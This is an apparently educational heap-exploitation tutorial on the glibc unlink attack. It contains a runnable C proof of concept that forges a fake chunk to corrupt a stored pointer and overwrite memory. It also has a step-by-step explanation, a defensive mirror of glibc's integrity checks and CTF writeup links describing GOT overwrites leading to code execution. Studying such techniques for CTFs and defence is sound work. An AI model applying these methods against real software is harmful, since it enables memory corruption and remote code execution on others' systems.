# Unlink Attack
When this attack was discovered it mostly allowed a WWW (Write What Where); however, some checks were later added that make the new version of the attack more interesting, more complex and, in practice, useless.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work

struct chunk_structure {
  size_t prev_size;
  size_t size;
  struct chunk_structure *fd;
  struct chunk_structure *bk;
  char buf[10];               // padding
};

int main() {
  unsigned long long *chunk1, *chunk2;
  struct chunk_structure *fake_chunk, *chunk2_hdr;
  char data[20];

  // First grab two chunks (non fast)
  chunk1 = malloc(0x8000);
  chunk2 = malloc(0x8000);
  printf("Stack pointer to chunk1: %p\n", &chunk1);
  printf("Chunk1: %p\n", chunk1);
  printf("Chunk2: %p\n", chunk2);

  // Assuming attacker has control over chunk1's contents
  // Overflow the heap, override chunk2's header

  // First forge a fake chunk starting at chunk1
  // Need to setup fd and bk pointers to pass the unlink security check
  fake_chunk = (struct chunk_structure *)chunk1;
  fake_chunk->size = 0x8000;
  fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
  fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P

  // Next modify the header of chunk2 to pass all security checks
  chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
  chunk2_hdr->prev_size = 0x8000;  // chunk1's data region size
  chunk2_hdr->size &= ~1;          // Unsetting prev_in_use bit

  // Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
  // This results in chunk1 pointer pointing to chunk1 - 3
  // i.e. chunk1[3] now contains chunk1 itself.
  // We then make chunk1 point to some victim's data
  free(chunk2);
  printf("Chunk1: %p\n", chunk1);
  printf("Chunk1[3]: %llx\n", chunk1[3]);

  chunk1[3] = (unsigned long long)data;

  strcpy(data, "Victim's data");

  // Overwrite victim's data using chunk1
  chunk1[0] = 0x002164656b636168LL;

  printf("%s\n", data);

  return 0;
}
```
* The attack does not work if tcaches are in use (glibc 2.26 and later)
### Goal
This attack allows **changing a pointer to a chunk so that it points 3 addresses before itself**. If this new location (the surroundings of where the pointer was stored) contains interesting things, such as other controllable allocations / the stack..., it is possible to read/overwrite them to cause greater harm.
* If this pointer was stored on the stack, because it now points 3 addresses before itself and the user can read and modify it, it would be possible to leak sensitive information from the stack or even modify the return address (possibly) without touching the canary
* In CTF examples, this pointer is stored in an array of pointers to other allocations, so by making it point 3 addresses before and being able to read and write it, it is possible to make the other pointers point to other addresses.\
Since the user can also read/write the other allocations, they can leak information or overwrite new addresses in arbitrary locations (such as the GOT).
### Requirements
* Some control over memory (e.g. the stack) to create a couple of chunks, giving values to some of their attributes.
* A stack leak in order to set the pointers of the fake chunk.
### Attack
* There are a couple of chunks (chunk1 and chunk2)
* The attacker controls the contents of chunk1 and the headers of chunk2.
* In chunk1 the attacker creates the structure of a fake chunk:
* To bypass the protections, they make sure the `size` field is correct, avoiding the error: `corrupted size vs. prev_size while consolidating`
* and the `fd` and `bk` fields of the fake chunk point to where the chunk1 pointer is stored, at offsets -3 and -2 respectively, so that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the position in memory (the stack) where the real chunk1 address is located:
<figure><img src="../../.gitbook/assets/image (1245).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
* The headers of chunk2 are modified to indicate that the previous chunk is not in use and that its size is the size of the fake chunk contained in chunk1.
* When the second chunk is freed, this fake chunk is unlinked, and the following happens:
* `fake_chunk->fd->bk` = `fake_chunk->bk`
* `fake_chunk->bk->fd` = `fake_chunk->fd`
* It was previously arranged that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the same place (the location on the stack where `chunk1` was stored, so it looked like a valid linked list). Since **both point to the same place**, only the last write (`fake_chunk->bk->fd = fake_chunk->fd`) **takes effect**.
* This **overwrites the pointer to chunk1 on the stack with the address (or bytes) stored 3 addresses before it on the stack**.
* Therefore, if the attacker can control the contents of chunk1 again, they will be able to **write inside the stack**, potentially overwriting the return address while skipping the canary and modifying the values and pointers of local variables. They could even modify the address of chunk1 stored on the stack once more to a different location, so that, if they can control the contents of chunk1 again, they can write anywhere.
* Note that this was possible because **the addresses are stored on the stack**. The risk and exploitability depend on **where the addresses of the fake chunk are stored**.
<figure><img src="../../.gitbook/assets/image (1246).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
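The two integrity checks the `size`/`prev_size` and `fd`/`bk` bullets above refer to, as an added example that is not code from this page or from glibc itself: a standalone C mirror of what glibc's `unlink_chunk` verifies before it rewrites `P->fd->bk` and `P->bk->fd`. The `struct mchunk` layout (64-bit), `link_chunk` and the `demo_*` functions are assumptions; a legitimate free chunk passes, while a fake `fd` or a mismatched size is rejected.

```c
#include <stddef.h>
/* Mirror of the glibc malloc_chunk header (assumption: 64-bit layout). */
struct mchunk { size_t prev_size; size_t size; struct mchunk *fd; struct mchunk *bk; };
#define CHUNKSIZE(p) ((p)->size & ~7UL)   /* strip the low flag bits */
enum unlink_result { UNLINK_OK = 0, UNLINK_BAD_SIZE = 1, UNLINK_BAD_LIST = 2 };

/* The two integrity checks glibc's unlink_chunk runs before it rewrites
   P->fd->bk and P->bk->fd; 'next' is the chunk physically after P. */
enum unlink_result check_unlink(const struct mchunk *p, const struct mchunk *next)
{
    /* "corrupted size vs. prev_size" */
    if (CHUNKSIZE(p) != next->prev_size)
        return UNLINK_BAD_SIZE;
    /* "corrupted double-linked list": both neighbours must point back at P */
    if (p->fd->bk != p || p->bk->fd != p)
        return UNLINK_BAD_LIST;
    return UNLINK_OK;
}
/* Build a consistent bin list head <-> p <-> tail, with p followed by next. */
static void link_chunk(struct mchunk *head, struct mchunk *p, struct mchunk *tail, struct mchunk *next, size_t sz)
{
    p->size = sz; next->prev_size = sz;
    head->fd = p; p->bk = head;
    tail->bk = p; p->fd = tail;
}

/* Untouched free chunk: passes both checks. */
enum unlink_result demo_legit(void)
{
    struct mchunk head = {0}, p = {0}, tail = {0}, next = {0};
    link_chunk(&head, &p, &tail, &next, 0x90);
    return check_unlink(&p, &next);
}

/* Overflow rewrote fd to an address whose bk does not point back at p. */
enum unlink_result demo_bad_fd(void)
{
    struct mchunk head = {0}, p = {0}, tail = {0}, next = {0}, stray = {0};
    link_chunk(&head, &p, &tail, &next, 0x90);
    p.fd = &stray;                 /* stray.bk is NULL, not &p */
    return check_unlink(&p, &next);
}

/* Overflow altered size so it no longer matches next->prev_size. */
enum unlink_result demo_bad_size(void)
{
    struct mchunk head = {0}, p = {0}, tail = {0}, next = {0};
    link_chunk(&head, &p, &tail, &next, 0x90);
    p.size = 0xa0;
    return check_unlink(&p, &next);
}
```

The list check only passes when both neighbours already hold a pointer back to the chunk being unlinked, which is exactly why the attack above needs a known location (the stack slot holding chunk1) that it can aim `fd` and `bk` at.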
## References
* [https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit)
* Although it would be unusual to find an unlink attack even in a CTF, here are some writeups where this attack was used:
* CTF example: [https://guyinatuxedo.github.io/30-unlink/hitcon14\_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14\_stkof/index.html)
* In this example, instead of the stack there is an array of malloc'ed addresses. The unlink attack is performed to be able to allocate a chunk there, thereby controlling the pointers in the array of malloc'ed addresses. Then, another function allows modifying the contents of the chunks at those addresses, which makes it possible to point addresses at the GOT and change function addresses to obtain leaks and RCE.
* Another CTF example: [https://guyinatuxedo.github.io/30-unlink/zctf16\_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16\_note2/index.html)
* As in the previous example, there is an array of allocation addresses. It is possible to perform an unlink attack to make the address of the first allocation point a few positions before the start of the array and to overwrite this allocation at its new position. Consequently, it is possible to overwrite the pointers of other allocations so that they point to the GOT entry of atoi, print it to obtain a libc leak, and then overwrite the GOT entry of atoi with the address of a one gadget.
* CTF example with custom malloc and free functions that abuse a vuln very similar to the unlink attack: [https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw17\_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw17\_minesweeper/index.html)
* There is an overflow that allows controlling the FD and BK pointers of the custom malloc, which will be (custom) freed. Moreover, the heap has the exec bit set, so it is possible to leak a heap address and point a function from the GOT to a heap chunk containing shellcode in order to execute it.